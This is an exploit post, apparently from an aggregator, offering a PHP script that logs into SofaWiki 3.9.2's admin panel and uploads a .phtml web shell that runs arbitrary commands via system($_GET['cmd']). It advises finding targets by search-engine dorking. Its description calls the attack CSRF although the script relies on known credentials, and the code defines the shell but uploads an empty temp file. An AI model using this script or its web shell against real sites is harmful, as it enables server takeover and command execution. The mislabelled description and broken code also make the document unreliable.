Share
## https://sploitus.com/exploit?id=PACKETSTORM:215891
=============================================================================================================================================
    | # Title     : SofaWiki 3.9.2 shell upload Vulnerability                                                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.sofawiki.com/site/files/snapshot.zip                                                                            |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.
    
       (Related : https://packetstorm.news/files/id/178203/ Related CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: script.php <base_url> <username> <password>
    
    [+] PayLoad :
    
    <?php
    if ($argc < 4) {
        echo "Usage: php exploit.php <base_url> <username> <password>\n";
        exit(1);
    }
    
    $base_url = $argv[1];
    $username = $argv[2];
    $password = $argv[3];
    
    $filename = rand(10000, 99999) . ".phtml";
    
    $ch = curl_init();
    
    $login_url = $base_url . "/index.php";
    $login_data = [
        "submitlogin" => "Login",
        "username" => $username,
        "pass" => $password,
        "name" => "SofaWiki",
        "action" => "login"
    ];
    
    echo "Exploiting...\n";
    sleep(1);
    
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    
    if (strpos($response, "Logout") === false) {
        echo "Login failed: " . $response . "\n";
        exit();
    }
    
    echo "Login Successful\n";
    sleep(1);
    
    $php_shell_code = <<<EOT
    <html>
    <body>
    <form method="GET" name="<?php echo basename(\$_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php
    if(isset(\$_GET['cmd']))
    {
        system(\$_GET['cmd']);
    }
    ?>
    </pre>
    </body>
    </html>
    EOT;
    
    echo "Shell uploading...\n";
    sleep(1);
    
    $upload_url = $base_url . "/index.php";
    $files = [
        "uploadedfile" => new CURLFile(tempnam(sys_get_temp_dir(), 'php'), "text/php", $filename),
        "action" => "uploadfile",
        "MAX_FILE_SIZE" => "8000000",
        "filename" => $filename,
        "content" => "content"
    ];
    
    curl_setopt($ch, CURLOPT_URL, $upload_url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $files);
    $response = curl_exec($ch);
    
    if ($response) {
        echo "Your shell is ready: {$base_url}/site/files/{$filename}\n";
    } else {
        echo "Upload failed: " . $response . "\n";
    }
    
    curl_close($ch);
    ?>
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================